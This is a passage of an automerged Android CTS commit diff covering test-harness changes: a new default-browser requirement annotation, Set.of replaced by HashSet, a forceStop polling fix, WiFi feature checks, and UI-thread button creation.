Merge "Do not use sample flags in queueInputBuffer" into main am: 3dd7db05d3

Original change: https://android-review.googlesource.com/c/platform/cts/+/2846340

Change-Id: Ifd8818d2ea2b74f1ce8e248177da4104b49ab06a
Signed-off-by: Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com>
diff --git a/apps/CtsVerifier/res/values/strings.xml b/apps/CtsVerifier/res/values/strings.xml
index 62423bb..b8c3b64 100644
--- a/apps/CtsVerifier/res/values/strings.xml
+++ b/apps/CtsVerifier/res/values/strings.xml
@@ -2395,7 +2395,7 @@
         particular ringer mode states works properly.
     </string>
     <string name="ringer_mode_pass_test">These tests are handled by CTS.</string>
-    <string name="test_sound_effects">Test touch sound</string>
+    <string name="test_sound_effects">Test Tap &amp; click sounds</string>
     <string name="test_vibrate_notification">Test vibrate notification</string>
     <string name="test_vibrate_ringer">Test vibrate ringer</string>
     <string name="test_access_ringer_mode">Test access ringer mode</string>
@@ -2403,7 +2403,7 @@
     <string name="test_volume_dnd_affected_stream">Test volume change</string>
     <string name="test_mute_dnd_affected_streams">Test mute streams</string>
     <string name="test_ringer_manager">Test RingtoneManager</string>
-    <string name="enable_sound_effects">Please enable touch sound in Sound settings.</string>
+    <string name="enable_sound_effects">Please enable Tap &amp; click sounds in Sound settings.</string>
     <string name="attention_ready">I\'m done</string>
     <string name="attention_filter_any">Please enable \"Do not disturb\" by tapping the Quick Settings tile.</string>
     <string name="attention_filter_all">Please disable \"Do not disturb\" by tapping the Quick Settings tile.</string>
diff --git a/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java b/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java
new file mode 100644
index 0000000..8537764
--- /dev/null
+++ b/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.bedstead.harrier.annotations;
+
+import static com.android.bedstead.harrier.UserType.INSTRUMENTED_USER;
+
+import com.android.bedstead.harrier.UserType;
+import java.lang.annotation.ElementType;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+
+/**
+ * Requires the user has a default browser
+ */
+@Target({ElementType.METHOD, ElementType.ANNOTATION_TYPE, ElementType.TYPE})
+@Retention(value = RetentionPolicy.RUNTIME)
+public @interface RequireHasDefaultBrowser {
+    /** Which user type should we check the browser for. */
+    UserType forUser() default INSTRUMENTED_USER;
+
+    FailureMode failureMode() default FailureMode.SKIP;
+}
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
index 23919f3..e0f53be 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
@@ -61,6 +61,7 @@
 
 import com.google.auto.value.AutoAnnotation;
 import com.google.common.collect.ImmutableMap;
+import com.google.common.collect.ImmutableSet;
 
 import org.junit.Test;
 import org.junit.rules.TestRule;
@@ -693,7 +694,7 @@
             }
 
             if (enterprisePolicy.delegatedScopes().length > 0) {
-                Set<String> newDelegatedScopes = Set.of(enterprisePolicy.delegatedScopes());
+                ImmutableSet<String> newDelegatedScopes = ImmutableSet.copyOf(enterprisePolicy.delegatedScopes());
                 if (!delegatedScopes.isEmpty()
                         && !delegatedScopes.containsAll(newDelegatedScopes)) {
                     throw new IllegalStateException("Cannot merge multiple policies which define "
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
index bb57dda9..1e6bdbe 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
@@ -100,6 +100,7 @@
 import com.android.bedstead.harrier.annotations.RequireFeatureFlagEnabled;
 import com.android.bedstead.harrier.annotations.RequireFeatureFlagNotEnabled;
 import com.android.bedstead.harrier.annotations.RequireFeatureFlagValue;
+import com.android.bedstead.harrier.annotations.RequireHasDefaultBrowser;
 import com.android.bedstead.harrier.annotations.RequireHeadlessSystemUserMode;
 import com.android.bedstead.harrier.annotations.RequireInstantApp;
 import com.android.bedstead.harrier.annotations.RequireLowRamDevice;
@@ -1294,6 +1295,18 @@
                 continue;
             }
 
+            if (annotation instanceof RequireHasDefaultBrowser) {
+                RequireHasDefaultBrowser requireHasDefaultBrowser =
+                        (RequireHasDefaultBrowser) annotation;
+                UserReference user =
+                            resolveUserTypeToUser(requireHasDefaultBrowser.forUser());
+
+                checkFailOrSkip("User: " + user + " does not have a default browser",
+                            TestApis.packages().defaultBrowserForUser(user) != null,
+                            requireHasDefaultBrowser.failureMode());
+                    continue;
+            }
+
             if (annotation instanceof RequireTelephonySupport) {
                 RequireTelephonySupport requireTelephonySupport =
                         (RequireTelephonySupport) annotation;
@@ -1407,6 +1420,7 @@
         }
 
         annotations.addAll(description.getAnnotations());
+        annotations.sort(BedsteadJUnit4::annotationSorter);
 
         checkAnnotations(annotations);
 
@@ -4016,14 +4030,14 @@
                         .findFirst();
 
         if (account.isPresent()) {
-            accounts(onUser).setFeatures(account.get(), Set.of(features));
+            accounts(onUser).setFeatures(account.get(), new HashSet<>(Arrays.asList(features)));
             mAccounts.put(key, account.get());
             TestApis.devicePolicy().calculateHasIncompatibleAccounts();
             return account.get();
         }
 
         AccountReference createdAccount = accounts(onUser).addAccount()
-                .features(Set.of(features))
+                .features(new HashSet<>(Arrays.asList(features)))
                 .add();
         mCreatedAccounts.add(createdAccount);
         mAccounts.put(key, createdAccount);
@@ -4168,7 +4182,7 @@
     private boolean trySetUserRestrictionWithDeviceOwner(String restriction) {
         ensureHasDeviceOwner(FailureMode.FAIL,
                 /* isPrimary= */ false, EnsureHasDeviceOwner.HeadlessDeviceOwnerType.NONE,
-                /* affiliationIds= */ Set.of(), /* type= */ DeviceOwnerType.DEFAULT,
+                /* affiliationIds= */ new HashSet<>(), /* type= */ DeviceOwnerType.DEFAULT,
                 EnsureHasDeviceOwner.DEFAULT_KEY, new TestAppProvider().query());
 
         RemotePolicyManager dpc = deviceOwner();
@@ -4186,7 +4200,7 @@
     private boolean trySetUserRestrictionWithProfileOwner(UserReference onUser, String restriction) {
         ensureHasProfileOwner(onUser,
                 /* isPrimary= */ false, /* isParentInstance= */ false,
-                /* affiliationIds= */ Set.of(), EnsureHasProfileOwner.DEFAULT_KEY,
+                /* affiliationIds= */ new HashSet<>(), EnsureHasProfileOwner.DEFAULT_KEY,
                 new TestAppProvider().query());
 
         RemotePolicyManager dpc = profileOwner(onUser);
@@ -4204,7 +4218,7 @@
     private boolean tryClearUserRestrictionWithDeviceOwner(String restriction) {
         ensureHasDeviceOwner(FailureMode.FAIL,
                 /* isPrimary= */ false, EnsureHasDeviceOwner.HeadlessDeviceOwnerType.NONE,
-                /* affiliationIds= */ Set.of(), /* type= */ DeviceOwnerType.DEFAULT,
+                /* affiliationIds= */ new HashSet<>(), /* type= */ DeviceOwnerType.DEFAULT,
                 EnsureHasDeviceOwner.DEFAULT_KEY, new TestAppProvider().query());
 
         RemotePolicyManager dpc = deviceOwner();
@@ -4222,7 +4236,7 @@
     private boolean tryClearUserRestrictionWithProfileOwner(UserReference onUser, String restriction) {
         ensureHasProfileOwner(onUser,
                 /* isPrimary= */ false, /* isParentInstance= */ false,
-                /* affiliationIds= */ Set.of(), EnsureHasProfileOwner.DEFAULT_KEY,
+                /* affiliationIds= */ new HashSet<>(), EnsureHasProfileOwner.DEFAULT_KEY,
                 new TestAppProvider().query());
 
         RemotePolicyManager dpc = profileOwner(onUser);
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
index c519b7a..a63932d 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
@@ -439,11 +439,11 @@
                     existingAnnotations.length + 1);
             newAnnotations[newAnnotations.length - 1] = ensureHasDevicePolicyManagerRoleHolder(
                     roleHolderUser, /* isPrimary= */ true);
-            return Set.of(annotation,
+            return new HashSet<>(Arrays.asList(annotation,
                     new DynamicParameterizedAnnotation(
                     annotation.annotationType().getSimpleName() + "_DPMRH",
                     newAnnotations
-            ));
+            )));
         };
     }
 
@@ -894,7 +894,7 @@
 
         for (Annotation annotation : annotations) {
             shadowingAnnotations.addAll(
-                    sReverseShadowMap.getOrDefault(annotation.annotationType(), Set.of()));
+                    sReverseShadowMap.getOrDefault(annotation.annotationType(), new HashSet<>()));
         }
 
         annotations.removeIf(a -> shadowingAnnotations.contains(a.annotationType()));
diff --git a/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java b/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
index e998853..d5dc680 100644
--- a/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
+++ b/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
@@ -54,6 +54,7 @@
 import android.app.ActivityManager;
 import android.app.admin.DevicePolicyManager;
 import android.app.contentsuggestions.ContentSuggestionsManager;
+import android.app.role.RoleManager;
 import android.os.Build;
 import android.os.Bundle;
 import android.os.UserManager;
@@ -108,6 +109,7 @@
 import com.android.bedstead.harrier.annotations.RequireFeatureFlagNotEnabled;
 import com.android.bedstead.harrier.annotations.RequireFeatureFlagValue;
 import com.android.bedstead.harrier.annotations.RequireGmsBuild;
+import com.android.bedstead.harrier.annotations.RequireHasDefaultBrowser;
 import com.android.bedstead.harrier.annotations.RequireHeadlessSystemUserMode;
 import com.android.bedstead.harrier.annotations.RequireInstantApp;
 import com.android.bedstead.harrier.annotations.RequireLowRamDevice;
@@ -1638,4 +1640,9 @@
         assertThat(TestApis.content().suggestions().defaultServiceEnabled(sDeviceState.additionalUser())).isTrue();
     }
 
+    @Test
+    @RequireHasDefaultBrowser
+    public void requireHasDefaultBrowser_onDifferentUser_defaultContentSuggestionsServiceIsEnabled() {
+        assertThat(TestApis.roles().getRoleHolders(RoleManager.ROLE_BROWSER)).isNotEmpty();
+    }
 }
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
index 0a4930f..26b2127 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
@@ -25,6 +25,7 @@
 
 import java.io.IOException;
 import java.util.ArrayList;
+import java.util.Arrays;
 import java.util.HashSet;
 import java.util.Set;
 import java.util.UUID;
@@ -102,7 +103,7 @@
      * Add features to the account.
      */
     public AccountBuilder addFeatures(String... feature) {
-        mFeatures.addAll(Set.of(feature));
+        mFeatures.addAll(new HashSet<>(Arrays.asList(feature)));
         return this;
     }
 
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
index 361de58..7ba1c55 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
@@ -716,16 +716,20 @@
 
             PackageManager userPackageManager =
                     TestApis.context().androidContextAsUser(user).getPackageManager();
-
+            boolean shouldCheckPreviousProcess = runningProcess() != null;
             // In most cases this should work first time, however if a user restriction has been
             // recently removed we may need to retry
+
+            int previousPid = shouldCheckPreviousProcess ? runningProcess().pid() : -1;
+
             Poll.forValue("Application flag", () -> {
                 userActivityManager.forceStopPackage(mPackageName);
 
-                return userPackageManager.getPackageInfo(mPackageName, PackageManager.GET_META_DATA)
-                        .applicationInfo.flags;
-            })
-                    .toMeet(flag -> (flag & FLAG_STOPPED) == FLAG_STOPPED)
+                return userPackageManager.getPackageInfo(mPackageName,
+                            PackageManager.GET_META_DATA)
+                            .applicationInfo.flags;
+            }).toMeet(flag -> !shouldCheckPreviousProcess || (flag & FLAG_STOPPED) == FLAG_STOPPED
+                            ||  previousPid != runningProcess().pid())
                     .errorOnFail("Expected application flags to contain FLAG_STOPPED ("
                             + FLAG_STOPPED + ")")
                     .await();
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
index d6cc3ae..7bce3ca 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
@@ -19,12 +19,15 @@
 import static android.Manifest.permission.INSTALL_PACKAGES;
 import static android.Manifest.permission.INTERACT_ACROSS_USERS;
 import static android.Manifest.permission.INTERACT_ACROSS_USERS_FULL;
+import static android.content.Intent.ACTION_VIEW;
 import static android.content.pm.PackageInstaller.EXTRA_PACKAGE_NAME;
 import static android.content.pm.PackageInstaller.EXTRA_STATUS;
 import static android.content.pm.PackageInstaller.EXTRA_STATUS_MESSAGE;
 import static android.content.pm.PackageInstaller.STATUS_FAILURE;
 import static android.content.pm.PackageInstaller.STATUS_SUCCESS;
 import static android.content.pm.PackageInstaller.SessionParams.MODE_FULL_INSTALL;
+import static android.content.pm.PackageManager.MATCH_ALL;
+import static android.content.pm.PackageManager.MATCH_DEFAULT_ONLY;
 import static android.os.Build.VERSION.SDK_INT;
 import static android.os.Build.VERSION_CODES.R;
 
@@ -39,7 +42,9 @@
 import android.content.pm.FeatureInfo;
 import android.content.pm.PackageInstaller;
 import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
 import android.content.res.Resources;
+import android.net.Uri;
 import android.os.Build;
 import android.util.Log;
 
@@ -71,7 +76,9 @@
 import java.util.Arrays;
 import java.util.Collection;
 import java.util.HashSet;
+import java.util.List;
 import java.util.Objects;
+import java.util.Optional;
 import java.util.Set;
 import java.util.stream.Collectors;
 
@@ -727,4 +734,53 @@
     public Package launcher() {
         return find(TestApis.ui().device().getLauncherPackageName());
     }
+
+    /**
+     * Finds the browser assigned to handle browsing intents by default for selected user.
+     *
+     * @return the package for the default browser if there is one, null otherwise.
+     */
+    @SuppressWarnings("NewApi")
+    @Experimental
+    public Package defaultBrowserForUser(UserReference user) {
+        ResolveInfo resolvedActivity;
+        List<ResolveInfo> possibleActivities;
+        Intent toResolve = new Intent(ACTION_VIEW, Uri.parse("http://"));
+
+        PackageManager pm = TestApis.context()
+                .androidContextAsUser(user)
+                .getPackageManager();
+
+        if (Versions.meetsMinimumSdkVersionRequirement(Versions.T)) {
+            possibleActivities = pm.queryIntentActivities(toResolve,
+                    PackageManager.ResolveInfoFlags.of(MATCH_ALL));
+            resolvedActivity = pm.resolveActivity(toResolve,
+                    PackageManager.ResolveInfoFlags.of(MATCH_DEFAULT_ONLY));
+        } else {
+            possibleActivities = pm.queryIntentActivities(toResolve, MATCH_ALL);
+            resolvedActivity = pm.resolveActivity(toResolve, MATCH_DEFAULT_ONLY);
+        }
+
+        Set<String> possibleBrowserPackageName = possibleActivities.stream()
+                .map(Packages::extractPackageName)
+                .filter(Objects::nonNull)
+                .collect(Collectors.toSet());
+
+        Log.e("SettingTest", "possibleBrowserPackageNames: " + possibleBrowserPackageName);
+
+        String resolvedBrowserPackageName = extractPackageName(resolvedActivity);
+        if (resolvedBrowserPackageName == null
+                || !possibleBrowserPackageName.contains(resolvedBrowserPackageName)) {
+            return null;
+        }
+
+        return find(resolvedBrowserPackageName);
+    }
+
+    private static String extractPackageName(@Nullable ResolveInfo nullableInfo) {
+        return Optional.ofNullable(nullableInfo)
+                .map(resolveInfo -> resolveInfo.activityInfo)
+                .map(activityInfo -> activityInfo.packageName)
+                .orElse(null);
+    }
 }
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
index 80edf68..0162fc0 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
@@ -59,6 +59,7 @@
 
 import java.time.Duration;
 import java.util.ArrayList;
+import java.util.Arrays;
 import java.util.Collection;
 import java.util.Comparator;
 import java.util.HashMap;
@@ -338,7 +339,7 @@
     private UserType managedProfileUserType() {
         UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
         managedProfileMutableUserType.mName = MANAGED_PROFILE_TYPE_NAME;
-        managedProfileMutableUserType.mBaseType = Set.of(UserType.BaseType.PROFILE);
+        managedProfileMutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.PROFILE));
         managedProfileMutableUserType.mEnabled = true;
         managedProfileMutableUserType.mMaxAllowed = -1;
         managedProfileMutableUserType.mMaxAllowedPerParent = 1;
@@ -349,7 +350,7 @@
         UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
         managedProfileMutableUserType.mName = SYSTEM_USER_TYPE_NAME;
         managedProfileMutableUserType.mBaseType =
-                Set.of(UserType.BaseType.FULL, UserType.BaseType.SYSTEM);
+                new HashSet<>(Arrays.asList(UserType.BaseType.FULL, UserType.BaseType.SYSTEM));
         managedProfileMutableUserType.mEnabled = true;
         managedProfileMutableUserType.mMaxAllowed = -1;
         managedProfileMutableUserType.mMaxAllowedPerParent = -1;
@@ -359,7 +360,7 @@
     private UserType secondaryUserType() {
         UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
         managedProfileMutableUserType.mName = SECONDARY_USER_TYPE_NAME;
-        managedProfileMutableUserType.mBaseType = Set.of(UserType.BaseType.FULL);
+        managedProfileMutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.FULL));
         managedProfileMutableUserType.mEnabled = true;
         managedProfileMutableUserType.mMaxAllowed = -1;
         managedProfileMutableUserType.mMaxAllowedPerParent = -1;
diff --git a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
index a2a4192..3d14dce 100644
--- a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
+++ b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
@@ -21,6 +21,7 @@
 
 import static com.google.common.truth.Truth.assertThat;
 
+import static org.junit.Assume.assumeNotNull;
 import static org.testng.Assert.assertThrows;
 
 import android.content.Context;
@@ -357,6 +358,24 @@
     }
 
     @Test
+    public void forceStop_whenRestartableApp_doesNotLoopEndlessly() {
+        final int previousId = TestApis.packages().launcher().runningProcess().pid();
+        TestApis.packages().launcher().forceStop();
+        assertThat(TestApis.packages().launcher().runningProcess().pid()).isNotEqualTo(previousId);
+    }
+
+    @Test
+    public void forceStop_whenNoRunningProcess_doesNotThrowException() {
+        final Package notRunningPackage = TestApis.packages().installedForUser().stream()
+                .filter(aPackage -> aPackage.runningProcess() == null)
+                .findFirst()
+                .get();
+        assumeNotNull(notRunningPackage);
+
+        notRunningPackage.forceStop();
+    }
+
+    @Test
     @EnsureHasSecondaryUser
     @RequireRunNotOnSecondaryUser
     public void installedOnUsers_doesNotIncludeUserWithoutPackageInstalled() throws Exception {
diff --git a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
index d05e091..603bdaa 100644
--- a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
+++ b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
@@ -22,6 +22,8 @@
 import org.junit.runner.RunWith;
 import org.junit.runners.JUnit4;
 
+import java.util.Arrays;
+import java.util.HashSet;
 import java.util.Set;
 
 @RunWith(JUnit4.class)
@@ -50,7 +52,7 @@
     @Test
     public void baseType_returnsBaseType() {
         UserType.MutableUserType mutableUserType = new UserType.MutableUserType();
-        mutableUserType.mBaseType = Set.of(UserType.BaseType.FULL);
+        mutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.FULL));
         UserType userType = new UserType(mutableUserType);
 
         assertThat(userType.baseType()).containsExactly(UserType.BaseType.FULL);
diff --git a/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java b/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
index 9c813c1..47caa4df 100644
--- a/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
+++ b/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
@@ -31,6 +31,8 @@
 
 import java.io.IOException;
 import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.HashSet;
 import java.util.Set;
 import java.util.stream.Collectors;
 import java.util.stream.Stream;
@@ -42,9 +44,9 @@
 public final class RemoteAccountAuthenticator extends TestAppInstance {
 
     // TODO(263350665): Query account types from xml
-    private static final Set<String> ACCOUNT_TYPES = Set.of(
+    private static final Set<String> ACCOUNT_TYPES = new HashSet<>(Arrays.asList(
             "com.android.bedstead.remoteaccountauthenticator.account"
-    );
+    ));
 
     private static final String REMOTE_ACCOUNT_AUTHENTICATOR_PACKAGE_NAME =
             "com.android.RemoteAccountAuthenticator";
diff --git a/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java b/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
index 558215e..6ed639d 100644
--- a/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
+++ b/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
@@ -26,6 +26,7 @@
 
 import java.util.ArrayList;
 import java.util.Arrays;
+import java.util.HashSet;
 import java.util.Set;
 
 /**
@@ -132,7 +133,7 @@
             hasFeatures = false;
         } else {
             hasFeatures = Arrays.asList(accountManager.getUserData(account, "features")
-                    .split(",")).containsAll(Set.of(features));
+                    .split(",")).containsAll(new HashSet<>(Arrays.asList(features)));
         }
 
         Bundle result = new Bundle();
diff --git a/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java b/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
index 45726b8..c99d9a2 100644
--- a/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
+++ b/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
@@ -15,9 +15,13 @@
  */
 package com.android.compatibility.common.deviceinfo;
 
+import android.content.pm.PackageManager;
+
 import android.net.wifi.ScanResult;
 import android.net.wifi.WifiManager;
 
+import android.os.Build;
+
 import android.util.Log;
 
 import com.android.compatibility.common.util.DeviceInfoStore;
@@ -63,12 +67,20 @@
         return "";
     }
 
+    private boolean hasWifi() {
+        return getContext().getPackageManager().hasSystemFeature(PackageManager.FEATURE_WIFI);
+    }
+
     @Override
     protected void collectDeviceInfo(DeviceInfoStore store) throws Exception {
-        try {
-            collectWifiStandards(store);
-        } catch (IOException e) {
-            Log.w(LOG_TAG, "Failed to collect WiFi standards", e);
+        if (hasWifi()) {
+            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
+                try {
+                    collectWifiStandards(store);
+                } catch (IOException e) {
+                    Log.w(LOG_TAG, "Failed to collect WiFi standards", e);
+                }
+            }
         }
     }
 
diff --git a/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java
new file mode 100644
index 0000000..4d95158
--- /dev/null
+++ b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package com.google.android.interactive.steps.enterprise.launcher;
+
+import com.android.interactive.Automation;
+import com.android.interactive.annotations.AutomationFor;
+
+@AutomationFor("com.google.android.interactive.steps.enterprise.launcher"
+        + ".DoesLauncherDefaultConfigurationContainPhoneShortcutStep")
+public class DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation implements Automation<Boolean> {
+    @Override
+    public Boolean automate() throws Exception {
+        return true;
+    }
+}
diff --git a/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java
new file mode 100644
index 0000000..d79cc75
--- /dev/null
+++ b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package com.google.android.interactive.steps.enterprise.launcher;
+
+import com.android.interactive.Automation;
+import com.android.interactive.annotations.AutomationFor;
+
+@AutomationFor("com.google.android.interactive.steps.enterprise.launcher"
+        + ".DoesLauncherDefaultConfigurationContainSmsShortcutStep")
+public class DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation implements Automation<Boolean> {
+    @Override
+    public Boolean automate() throws Exception {
+        return true;
+    }
+}
diff --git a/common/device-side/interactive/src/main/java/com/android/interactive/Step.java b/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
index abe25f1..faf347d 100644
--- a/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
+++ b/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
@@ -22,6 +22,8 @@
 import static com.android.interactive.Automator.AUTOMATION_FILE;
 
 import android.graphics.PixelFormat;
+import android.os.Handler;
+import android.os.Looper;
 import android.util.Log;
 import android.view.Gravity;
 import android.view.LayoutInflater;
@@ -247,27 +249,32 @@
      * Adds a button to the interaction prompt.
      */
     protected void addButton(String title, Runnable onClick) {
-        Button btn = new Button(TestApis.context().instrumentedContext());
-        btn.setText(title);
-        btn.setOnClickListener(v -> onClick.run());
+        // Push to UI thread to avoid animation issues when adding the button
+        new Handler(Looper.getMainLooper()).post(() -> {
+            Button btn = new Button(TestApis.context().instrumentedContext());
+            btn.setText(title);
+            btn.setOnClickListener(v -> onClick.run());
 
-        GridLayout layout = mInstructionView.findViewById(R.id.buttons);
-        layout.addView(btn);
+            GridLayout layout = mInstructionView.findViewById(R.id.buttons);
+            layout.addView(btn);
+        });
     }
 
     /**
      * Adds small button with a single up/down arrow, used for moving the text box to the
      * bottom of the screen in case it covers some critical area of the app
      */
-
     protected void addSwapButton() {
-        Button btn = new Button(TestApis.context().instrumentedContext());
-        // up/down arrow
-        btn.setText("\u21F5");
-        btn.setOnClickListener(v -> swap());
+        // Push to UI thread to avoid animation issues when adding the button
+        new Handler(Looper.getMainLooper()).post(() -> {
+            Button btn = new Button(TestApis.context().instrumentedContext());
+            // up/down arrow
+            btn.setText("\u21F5");
+            btn.setOnClickListener(v -> swap());
 
